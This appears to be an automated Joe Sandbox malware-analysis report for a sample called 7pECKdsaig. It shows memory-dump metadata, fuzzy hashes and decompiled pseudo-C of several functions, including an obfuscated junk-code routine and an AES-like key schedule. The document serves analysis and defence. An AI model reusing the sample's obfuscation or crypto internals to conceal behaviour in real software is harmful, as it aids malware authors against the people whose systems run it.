0x00a9e3c0
0x00a9e3c6
0x00a9e3cc
0x00a9e3d1
0x00a9e3d7
0x00a9e3dd
0x00a9e3e4
0x00a9e3eb
0x00a9e3f1
0x00a9e3f2
0x00a9e3f8
0x00a9e3fe
0x00a9e408
0x00a9e40e
0x00a9e414
0x00a9e41a
0x00a9e420
0x00a9e427
0x00a9e42e
0x00a9e434
0x00a9e43a
0x00a9e43b
0x00a9e43c
0x00a9e443
0x00a9e444
0x00a9e44b
0x00a9e457
0x00a9e458
0x00a9e464
0x00a9e46a
0x00a9e471
0x00a9e476
0x00a9e47c
0x00a9e47e
0x00a9e484
0x00a9e48a
0x00a9e491
0x00a9e497
0x00a9e498
0x00a9e49e
0x00a9e4a6
0x00a9e4ad
0x00a9e4b3
0x00a9e4b8
0x00a9e4be
0x00a9e4c4
0x00a9e4cb
0x00a9e4d1
0x00a9e4d7
0x00a9e4e3
0x00a9e4ea
0x00a9e4f0
0x00a9e4f6
0x00a9e4fc
0x00a9e502
0x00a9e508
0x00a9e50e
0x00a9e515
0x00a9e516
0x00a9e51c
0x00a9e526
0x00a9e533
0x00a9e539
0x00a9e545
0x00a9e545
0x00a9e545
0x00a9e54b
0x00a9e54c
0x00a9e558
0x00a9e559
0x00a9e565
0x00a9e56c
0x00a9e573
0x00a9e579
0x00a9e579
0x00a9e4f0
0x00a9e44b
0x00a9e3f8
0x00a9e3ad
0x00a9e399
0x00a9e344
0x00a9e31a
0x00a9d596
0x00a9d596
0x00a9d59d
0x00a9d5a3
0x00a9d5a5
0x00a9d5a5
0x00000000

Memory Dump Source

Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c87cd99203250971db0e061da22870b89c1cb5bd800525243654fdb24edf8dc
Instruction ID: 9119a3f6afbfe1ca47bdc45593e06f199f9caa0142aee831afb4ae9e02630056
Opcode Fuzzy Hash: 8c87cd99203250971db0e061da22870b89c1cb5bd800525243654fdb24edf8dc
Instruction Fuzzy Hash: FE915133A09795CFD716CF38C94AA813BB1F7463A0B48835ED8A1935D2D338206ADB85

Uniqueness

Uniqueness Score: -1.00%

Function 00A9E866 Relevance: .2, Instructions: 177
COMMONCrypto

Download Yara Rule

C-Code - Quality: 61%

			E00A9E866(signed char __eax, void* __ebx, signed char __ecx, void* __edx, signed int __esi) {
				signed char _t17;
				signed int _t18;
				signed char _t20;
				signed char _t23;
				signed char _t30;
				intOrPtr _t32;
				char _t38;
				signed int _t42;
				signed int _t46;
				signed int _t48;
				void* _t50;
				void* _t52;
				void* _t54;

				_t48 = __esi;
				_t30 = __ecx;
				_t17 = __eax;
				 *0x16efa8e0 =  *0x16efa8e0 + __eax;
				 *0xb4a0470c =  *0xb4a0470c << 0x13;
				_t42 = 0xcc32c1de;
				asm("sbb esp, [0x16d24939]");
				_t38 = __edx -  *0x3ccdc486;
				_t55 = _t54 - 0x32c1ddbd;
				asm("sbb esp, [0x93b70016]");
				_t23 = __ebx - 1;
				if(_t23 < 0) {
					L1:
					asm("rcl byte [0x939ff7b7], 0xe0");
					asm("adc al, 0xb0");
					 *0x748f83e7 = _t17;
					_t55 = _t55 ^ 0xe217dc62;
					_t50 = _t50 - 1 +  *0xc4bbc419;
					asm("sbb ch, [0x759084e5]");
					_t48 = _t48 - 1;
					_t17 = _t17 +  *0x218dd63;
					_t38 = _t38 - 0xb0;
					asm("scasb");
				} else {
					__esi =  *0xaf88ac70;
					_pop(__edi);
					asm("rcr dword [0x16d24939], 0xc6");
					 *0x54942410 =  *0x54942410 - __bl;
					__cl = __cl - 0xb4;
					__eax = __eax +  *0x16ef45d8;
					__esp = __esp - 1;
					asm("rcl byte [0x897790e0], 0xde");
					__cl = __cl;
					 *0xd8a8c4a8 =  *0xd8a8c4a8 | __dh;
					__ebp = __ebp + 1;
					__edx = __edx ^ 0x9e3f16ef;
					__esp = __esp |  *0xf9e2bc0;
					__edi = __edi ^  *0x40ecb2a1;
					asm("rcr byte [0x8f16ef88], 0xb2");
					__ch = __ch &  *0xa8c4a800;
					 *0x16ef45d8 =  *0x16ef45d8 ^ __ecx;
					 *0x2bbc121f = 0x826380d6;
					 *0xb2a10f9e =  *0xb2a10f9e + __eax;
					asm("ror dword [0xef8840ec], 0x93");
					asm("sbb edx, [0x9fe24b16]");
					__ecx = __ecx |  *0xccf0cc31;
					asm("sbb eax, 0x49395fc2");
					 *0x33941616 =  *0x33941616 >> 0x8e;
					__edi = __edi +  *0xc1dec32e;
					asm("adc bh, 0x32");
					__ebp = __ebp -  *0x81e26216;
					asm("sbb [0xa8009a80], ch");
					__esi = 0x45d8a8c4;
					if(__edi < 0) {
						goto L1;
						do {
							do {
								do {
									goto L1;
								} while (_t38 >= 0);
								 *0xe77cd173 =  *0xe77cd173 - _t17;
								asm("lodsb");
								 *0xef4544a1 =  *0xef4544a1 << 0x5b;
								_pop( *0x2f9d1616);
								_t38 = _t38 +  *0xc1ddbd1c;
								_t55 = 0xc02c16ef;
								_t23 = _t23 ^  *0xe0cc32b2;
								_t17 = _t17 + 0xa8;
								_t50 = _t50 + 1;
								_t48 = _t48 +  *0xefca2585 |  *0xc1daa919;
								 *0xa8e0cc32 =  *0xa8e0cc32 ^ _t17;
							} while ( *0xc83916ef != 0xc02c16ef);
							 *0xd8a8c4a8 =  *0xd8a8c4a8 << 0xf0;
							_t52 = _t50 + 1;
							asm("adc esi, [0xc68ff209]");
							 *0x173a7bc8 =  *0x173a7bc8 << 0xb2;
							_push(0xe0cc32c1);
							_t18 = _t17 + 1;
							 *0x4052173a =  *0x4052173a >> 0x3f;
							_t32 = 0xef45d88d + (_t30 &  *0x3816efa8);
							asm("rol dword [0x50405217], 0x74");
							 *0xef45d88d = _t18;
							 *0x9cba1d16 = _t18;
							_t20 = _t18;
							asm("sbb dl, 0xb4");
							asm("adc edi, [0x8daddd0f]");
							asm("sbb esi, [0x16ef45d8]");
							asm("scasb");
							asm("rcl byte [0x3d99a1e7], 0x5d");
							 *0x1db40ffd = _t32;
							asm("adc esp, 0xe0cc3283");
							 *0x16efa8e0 =  *0x16efa8e0 + 0xffffffffe0cc32fb;
							 *0xbe17ff2f =  *0xbe17ff2f + 0xffffffffe0cc32fb;
							asm("adc eax, 0x2b7093ff");
							 *0xfa34f216 =  *0xfa34f216 + (_t42 -  *0x997775 |  *0xef45d88d);
							asm("adc cl, [0xb9d9b004]");
							 *0xc62116ef =  *0xc62116ef << 0x66;
							 *0x1ee67b3 =  *0x1ee67b3 | _t20;
							_t38 = (0xffffffffe0cc32fb ^  *0xa8e0cc32) + 0xd2;
							asm("sbb edx, [0x76a2f716]");
							asm("stosb");
							 *0x5f828ee2 =  *0x5f828ee2 >> 0x98;
							 *0x16d24939 = 0x32ee16ef;
							 *0x140b36b6 = _t38;
							asm("sbb eax, 0x32ccebb8");
							 *0x8ce2a816 = _t48;
							 *0xa8e0cc32 =  *0xa8e0cc32 << 0x7b;
							_t50 = _t52 + 0xffffffffd79c0127;
							 *0xf2ba16ef =  *0xf2ba16ef << 0x50;
							asm("rcr dword [0xf9af869a], 0xa2");
							asm("sbb esp, [0x395fc3cc]");
							asm("stosd");
							 *0x32baf2c1 = _t32 - 1 -  *0xefa8e0cc - 1 +  *0x9c420816;
							asm("rcr dword [0xefa8e0cc], 0x74");
							asm("cmpsw");
							asm("adc eax, 0xbed3f5bd");
							_t46 = _t52;
							_t30 = 0x16d24939;
							 *0xa4071c62 =  *0xa4071c62 | _t46;
							_t55 = (0xc02c16ef |  *0x9e8e16ef) & 0xcc32c1db;
							asm("sbb bl, 0xe0");
							_t17 =  *0xfe16efa8;
							 *0x9a7c73a2 = 0x16d24939;
							_t23 = ( *0x311087db +  *0x2b16efa8 + 0x0000008a ^  *0xcc32bfdd) -  *0x16efa8e0 &  *0x32c5f7c6 ^  *0xa8c4a800;
							 *0x16ef45d8 =  *0x16ef45d8 & _t46;
							asm("adc esp, 0x9ba0f4be");
							asm("rol byte [0xa899d1b4], 0x5f");
							_t42 =  *0x16d24939;
						} while ( *0x16ef45d8 != 0);
						 *0x2e33947a =  *0x2e33947a | _t42;
						return _t17;
					} else {
						 *0x52173a78 = __ebx;
						__eax = __eax + 1;
						_push(__eax);
						__edx = __edx -  *0xef45d88d;
						__al = __al | 0x00000016;
						return __eax;
					}
				}
			}

0x00a9e866
0x00a9e866
0x00a9e866
0x00a9e86b
0x00a9e871
0x00a9e87e
0x00a9e87f
0x00a9e885
0x00a9e88b
0x00a9e897
0x00a9e89d
0x00a9e89e
0x00a9e613
0x00a9e613
0x00a9e61a
0x00a9e61c
0x00a9e622
0x00a9e628
0x00a9e62e
0x00a9e634
0x00a9e635
0x00a9e63b
0x00a9e63e
0x00a9e8a4
0x00a9e8a4
0x00a9e8aa
0x00a9e8ab
0x00a9e8b2
0x00a9e8b8
0x00a9e8c1
0x00a9e8c7
0x00a9e8c8
0x00a9e8cf
0x00a9e8d2
0x00a9e8d8
0x00a9e8d9
0x00a9e8df
0x00a9e8e5
0x00a9e8eb
0x00a9e8f7
0x00a9e8fd
0x00a9e903
0x00a9e909
0x00a9e90f
0x00a9e916
0x00a9e91c
0x00a9e922
0x00a9e92a
0x00a9e931
0x00a9e937
0x00a9e940
0x00a9e946
0x00a9e94c
0x00a9e957
0x00000000
0x00a9e613
0x00a9e613
0x00a9e613
0x00000000
0x00000000
0x00a9e641
0x00a9e647
0x00a9e648
0x00a9e64f
0x00a9e655
0x00a9e661
0x00a9e66c
0x00a9e672
0x00a9e67b
0x00a9e67c
0x00a9e682
0x00a9e688
0x00a9e696
0x00a9e69d
0x00a9e6a4
0x00a9e6b6
0x00a9e6bd
0x00a9e6be
0x00a9e6cc
0x00a9e6d4
0x00a9e6e3
0x00a9e6ea
0x00a9e6f0
0x00a9e6f6
0x00a9e6f7
0x00a9e6fa
0x00a9e700
0x00a9e706
0x00a9e70e
0x00a9e71b
0x00a9e721
0x00a9e739
0x00a9e742
0x00a9e754
0x00a9e764
0x00a9e76a
0x00a9e776
0x00a9e77d
0x00a9e78a
0x00a9e78d
0x00a9e794
0x00a9e795
0x00a9e79c
0x00a9e7a2
0x00a9e7a8
0x00a9e7b3
0x00a9e7bf
0x00a9e7cc
0x00a9e7db
0x00a9e7e2
0x00a9e7e9
0x00a9e7f9
0x00a9e7fa
0x00a9e800
0x00a9e80d
0x00a9e80f
0x00a9e814
0x00a9e815
0x00a9e81e
0x00a9e824
0x00a9e82a
0x00a9e82d
0x00a9e833
0x00a9e839
0x00a9e83f
0x00a9e845
0x00a9e84b
0x00a9e853
0x00a9e853
0x00a9e85f
0x00a9e865
0x00a9e95d
0x00a9e95d
0x00a9e963
0x00a9e964
0x00a9e965
0x00a9e96b
0x00a9e96d
0x00a9e96d
0x00a9e957

Memory Dump Source

Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 889d42441f6580e342869c725cd4174b5c8302bc4555e28ff9271fccf7e17d02
Instruction ID: 3e3a1e51b7d1c51eb0d871f3ccc865b0c4546a2167deb6747ded083446969ce2
Opcode Fuzzy Hash: 889d42441f6580e342869c725cd4174b5c8302bc4555e28ff9271fccf7e17d02
Instruction Fuzzy Hash: 6481043294D3C1DFE712DF78E8A66853FB1EB96324709038DC9A15B2D2D7741066CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A82D90 Relevance: .2, Instructions: 165
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E00A82D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t66;
				signed int* _t69;
				signed int* _t81;
				signed int _t94;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int* _t110;
				signed int _t127;
				signed int _t129;
				signed int _t133;
				signed int _t152;
				intOrPtr _t171;

				_t81 = _a12;
				_t110 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
				_t66 =  &(_t110[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L4:
					return _t66 | 0xffffffff;
				} else {
					_t171 = _a4;
					_t69 = 0;
					_a12 = 0;
					while(1) {
						_t152 =  *(_t66 + 0x18);
						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t127 =  *_t66 ^ _t94;
						 *(_t66 + 0x1c) = _t94;
						_t96 =  *(_t66 + 4) ^ _t127;
						 *(_t66 + 0x20) = _t127;
						_t129 =  *(_t66 + 8) ^ _t96;
						 *(_t66 + 0x24) = _t96;
						 *(_t66 + 0x28) = _t129;
						if(_t69 == 6) {
							break;
						}
						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t133 =  *(_t66 + 0x10) ^ _t106;
						 *(_t66 + 0x2c) = _t106;
						_t108 =  *(_t66 + 0x14) ^ _t133;
						 *(_t66 + 0x34) = _t108;
						_t69 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t133;
						 *(_t66 + 0x38) = _t108 ^ _t152;
						_t66 = _t66 + 0x20;
						_a12 = _t69;
						if(_t69 < 7) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					return 0xe;
				}
				L6:
			}

0x00a82d93
0x00a82d98
0x00a82da0
0x00a82da9
0x00a82db3
0x00a82dba
0x00a82dc3
0x00a82dce
0x00a82dd6
0x00a82ddf
0x00a82dea
0x00a82df0
0x00a82df5
0x00a82dfe
0x00a82e09
0x00a82e11
0x00a82e1a
0x00a82e25
0x00a82e2d
0x00a82e36
0x00a82e41
0x00a82e49
0x00a82e52
0x00a82e5d
0x00a82e65
0x00a82e6e
0x00a82e80
0x00a82e83
0x00a82f9f
0x00a82fa4
0x00a82e89
0x00a82e89
0x00a82e8c
0x00a82e8e
0x00a82e91
0x00a82e91
0x00a82ef6
0x00a82efb
0x00a82efd
0x00a82f03
0x00a82f05
0x00a82f0b
0x00a82f0d
0x00a82f10
0x00a82f16
0x00000000
0x00000000
0x00a82f72
0x00a82f78
0x00a82f7a
0x00a82f80
0x00a82f82
0x00a82f87
0x00a82f88
0x00a82f8b
0x00a82f8e
0x00a82f91
0x00a82f97
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00a82f97
0x00a82fae
0x00a82fae
0x00000000

Memory Dump Source

Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction ID: a142f8b72a8354a4515d6c4aa4955448cf657d8894a862bebf9c662ae38935e5
Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction Fuzzy Hash: 5B5170B3E54A214BD3188F09CC40631B792EFD8312B5B81BADD1A9B357CA74E9529B90

Uniqueness

Uniqueness Score: -1.00%

Function 017152A5 Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E017152A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					L0172EEF0(0x18079a0);
					_t104 =  *0x1808210; // 0x1451cf8
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0172EB70(_t93, 0x18079a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E01759890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									L0172EEF0(0x18079a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0172EB70(0, 0x18079a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x1451d05
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0174F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									L0172EEF0(0x18079a0);
									__eflags =  *0x1808210 - _t104; // 0x1451cf8
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1808210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E01794888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0172EB70(_t95, 0x18079a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E017595D0();
											L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E017595D0();
											L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0172EB70(_t93, 0x18079a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E017595D0();
										L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E017595D0();
										L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0174F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x017152a5
0x017152ad
0x017152b0
0x017152b3
0x017152b7
0x017152ba
0x017152bf
0x017152c4
0x017152cc
0x00000000
0x00000000
0x017152ce
0x017152d9
0x017152dd
0x017152e7
0x017152f7
0x017152f9
0x017152fd
0x01770dcf
0x01770dd5
0x01770dd6
0x01770dd7
0x01770dd8
0x01770dd9
0x01770dde
0x01770ddf
0x01770de0
0x01770de1
0x01770de2
0x01770de5
0x01770dea
0x01770dec
0x01770f60
0x01770f64
0x01770f70
0x01770f76
0x01770f79
0x01770f79
0x00000000
0x01770f64
0x01770df2
0x01770df7
0x01770e04
0x01770e0d
0x01770e0d
0x01770e10
0x01770e1a
0x01770e1c
0x01770e4c
0x01770e52
0x01770e61
0x01770e67
0x01770e6b
0x01770e70
0x01770e76
0x01770ed7
0x01770edc
0x01770ee0
0x01770ee6
0x01770eea
0x01770eed
0x01770ef0
0x01770ef3
0x01770ef6
0x01770ef9
0x01770efe
0x01770f01
0x01770f01
0x01770f0b
0x01770f12
0x01770f16
0x01770f18
0x01770f1b
0x01770f2c
0x01770f31
0x01770f31
0x01770f35
0x01770f39
0x01770f3a
0x01770f3c
0x01770f3f
0x01770f50
0x01770f55
0x01770f55
0x01770f59
0x017152eb
0x017152f1
0x017152f1
0x01770e7d
0x01770e84
0x01770e88
0x01770e8a
0x01770e8d
0x01770e9e
0x01770ea3
0x01770ea3
0x01770ea7
0x01770eaf
0x01770eb3
0x01770eb9
0x01770eb9
0x01770ebc
0x01770ecd
0x01770ecd
0x00000000
0x01770eb3
0x01770e21
0x01770e2b
0x01770e2f
0x01770e30
0x01770e3a
0x01770e3f
0x01770e41
0x00000000
0x00000000
0x01770e47
0x00000000
0x01770e47
0x01770df9
0x01770dfe
0x00000000
0x00000000
0x00000000
0x01770dfe
0x01715303
0x01715307
0x00000000
0x01715309
0x00000000
0x01715309
0x01715307
0x017152e9
0x017152e9
0x00000000
0x017152e9
0x0171530e
0x00000000

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 626f3edcca2faa7dc60aebda4a0a2df2f2d6ba837db84d37e5764ba0adbd2bdc
Instruction ID: 7a31069bb76ccb712e7f8c7ce3fe92298ae7da8158eaaa6d07f14a1f8b06ae7b
Opcode Fuzzy Hash: 626f3edcca2faa7dc60aebda4a0a2df2f2d6ba837db84d37e5764ba0adbd2bdc
Instruction Fuzzy Hash: 5E51DCB1205342AFD722EF28C844B27FBA4FFA5714F10091EF49587695E7B4E940CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01742AE4 Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01742AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x1808204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x1808208; // 0x1808207
				_t8 = _t57 + 0x1808208; // 0x1808207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x1808450; // 0x1453c80
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x180821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x1806d5c; // 0x7f7c0654
							_t72 =  *0x1806d5c; // 0x7f7c0654
							_t75 =  *0x1806d5c; // 0x7f7c0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x1806d5c; // 0x7f7c0654
							_t84 =  *0x1806d5c; // 0x7f7c0654
							_t87 =  *0x1806d5c; // 0x7f7c0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
